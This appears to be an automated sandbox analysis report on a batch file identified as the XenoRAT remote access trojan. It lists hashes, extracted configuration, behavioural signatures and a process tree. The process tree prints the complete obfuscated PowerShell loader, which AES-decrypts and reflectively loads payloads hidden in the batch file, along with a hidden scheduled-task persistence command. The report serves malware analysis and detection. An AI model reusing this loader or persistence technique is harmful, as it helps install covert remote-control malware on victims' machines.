Analysis
-
max time kernel
144s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-08-2024 12:24
Static task
static1
Behavioral task
behavioral1
Sample
Universe.bat
Resource
win7-20240729-en
General
-
Target
Universe.bat
-
Size
266KB
-
MD5
b20843491bae175a8a3ea58950133d1a
-
SHA1
33552409f87c4b04f1a97e21c181e27327e0f847
-
SHA256
d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c
-
SHA512
998bfa168786a28b6d5dc1d682ee7a75eceee58980a4a643c6c89d52a521bc592aa261c653d24f697c4e092379f63816344ff3667a6acb9d21bbeb2016d8c18b
-
SSDEEP
6144:J4blXryzoC5iq4a8PLJlAl0bBt1Az2iZg7Z8esqA4zX:ibc8ICa8PNC0blH9dsqh
Malware Config
Extracted
xenorat
127.0.0.1
Xeno_rat_nd8912d
-
delay
5000
-
install_path
nothingset
-
port
4444
-
startup_name
nothingset
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1160 powershell.exe 2312 powershell.exe 3092 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2312 powershell.exe 2312 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 1160 powershell.exe 1160 powershell.exe 1160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeIncreaseQuotaPrivilege 3092 powershell.exe Token: SeSecurityPrivilege 3092 powershell.exe Token: SeTakeOwnershipPrivilege 3092 powershell.exe Token: SeLoadDriverPrivilege 3092 powershell.exe Token: SeSystemProfilePrivilege 3092 powershell.exe Token: SeSystemtimePrivilege 3092 powershell.exe Token: SeProfSingleProcessPrivilege 3092 powershell.exe Token: SeIncBasePriorityPrivilege 3092 powershell.exe Token: SeCreatePagefilePrivilege 3092 powershell.exe Token: SeBackupPrivilege 3092 powershell.exe Token: SeRestorePrivilege 3092 powershell.exe Token: SeShutdownPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeSystemEnvironmentPrivilege 3092 powershell.exe Token: SeRemoteShutdownPrivilege 3092 powershell.exe Token: SeUndockPrivilege 3092 powershell.exe Token: SeManageVolumePrivilege 3092 powershell.exe Token: 33 3092 powershell.exe Token: 34 3092 powershell.exe Token: 35 3092 powershell.exe Token: 36 3092 powershell.exe Token: SeIncreaseQuotaPrivilege 3092 powershell.exe Token: SeSecurityPrivilege 3092 powershell.exe Token: SeTakeOwnershipPrivilege 3092 powershell.exe Token: SeLoadDriverPrivilege 3092 powershell.exe Token: SeSystemProfilePrivilege 3092 powershell.exe Token: SeSystemtimePrivilege 3092 powershell.exe Token: SeProfSingleProcessPrivilege 3092 powershell.exe Token: SeIncBasePriorityPrivilege 3092 powershell.exe Token: SeCreatePagefilePrivilege 3092 powershell.exe Token: SeBackupPrivilege 3092 powershell.exe Token: SeRestorePrivilege 3092 powershell.exe Token: SeShutdownPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeSystemEnvironmentPrivilege 3092 powershell.exe Token: SeRemoteShutdownPrivilege 3092 powershell.exe Token: SeUndockPrivilege 3092 powershell.exe Token: SeManageVolumePrivilege 3092 powershell.exe Token: 33 3092 powershell.exe Token: 34 3092 powershell.exe Token: 35 3092 powershell.exe Token: 36 3092 powershell.exe Token: SeIncreaseQuotaPrivilege 3092 powershell.exe Token: SeSecurityPrivilege 3092 powershell.exe Token: SeTakeOwnershipPrivilege 3092 powershell.exe Token: SeLoadDriverPrivilege 3092 powershell.exe Token: SeSystemProfilePrivilege 3092 powershell.exe Token: SeSystemtimePrivilege 3092 powershell.exe Token: SeProfSingleProcessPrivilege 3092 powershell.exe Token: SeIncBasePriorityPrivilege 3092 powershell.exe Token: SeCreatePagefilePrivilege 3092 powershell.exe Token: SeBackupPrivilege 3092 powershell.exe Token: SeRestorePrivilege 3092 powershell.exe Token: SeShutdownPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeSystemEnvironmentPrivilege 3092 powershell.exe Token: SeRemoteShutdownPrivilege 3092 powershell.exe Token: SeUndockPrivilege 3092 powershell.exe Token: SeManageVolumePrivilege 3092 powershell.exe Token: 33 3092 powershell.exe Token: 34 3092 powershell.exe Token: 35 3092 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4972 wrote to memory of 2312 4972 cmd.exe 95 PID 4972 wrote to memory of 2312 4972 cmd.exe 95 PID 2312 wrote to memory of 3092 2312 powershell.exe 96 PID 2312 wrote to memory of 3092 2312 powershell.exe 96 PID 2312 wrote to memory of 2932 2312 powershell.exe 102 PID 2312 wrote to memory of 2932 2312 powershell.exe 102 PID 2932 wrote to memory of 4840 2932 WScript.exe 103 PID 2932 wrote to memory of 4840 2932 WScript.exe 103 PID 4840 wrote to memory of 1160 4840 cmd.exe 106 PID 4840 wrote to memory of 1160 4840 cmd.exe 106
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Universe.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Universe.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Universe.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_984_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_984.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_984.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_984.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_984.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_984.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1160
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1296,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:81⤵PID:1320
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD56b8559593a74eb3b15c53a9fac9a469f
SHA113af213d1417edf30c03f76f9242c1975b2e4e74
SHA256e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9
SHA512699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974
-
Filesize
1KB
MD5b03f844e31d3cff178bf28968b6a618e
SHA1da8264e5da16e43515c3760954af5f9db717059b
SHA2561767b4f469c955d68b8252cb68bf22ed7116ca4cd7793f877763f7e954a72c4a
SHA512c38ea43e6759407f1934db93461002e8006c0c24530ffe2a8002d4c4174f733339a7345cd8e2152aa653ef4d0a0a1ef98e97ea46deaadf98ac60ca904ed4f5d3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
266KB
MD5b20843491bae175a8a3ea58950133d1a
SHA133552409f87c4b04f1a97e21c181e27327e0f847
SHA256d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c
SHA512998bfa168786a28b6d5dc1d682ee7a75eceee58980a4a643c6c89d52a521bc592aa261c653d24f697c4e092379f63816344ff3667a6acb9d21bbeb2016d8c18b
-
Filesize
115B
MD55b02c7370c7b81a6e4affa2d256d5f07
SHA14601ce806f55f6ffef21decf0f3670e573d4fc38
SHA256e44b1cb9e698656d1f0e2229e111a5aef43a7d3a3440c5a7fbd15902cd3141c0
SHA51249a1c57c0c0fb0b7a9b5af5ee4f9adc6ad4edd621ea64693515b4a87d2459ddbbc28dbeb4b9c0da20cef260c5797c7c4645c2ede06c9560f936767dab3380bef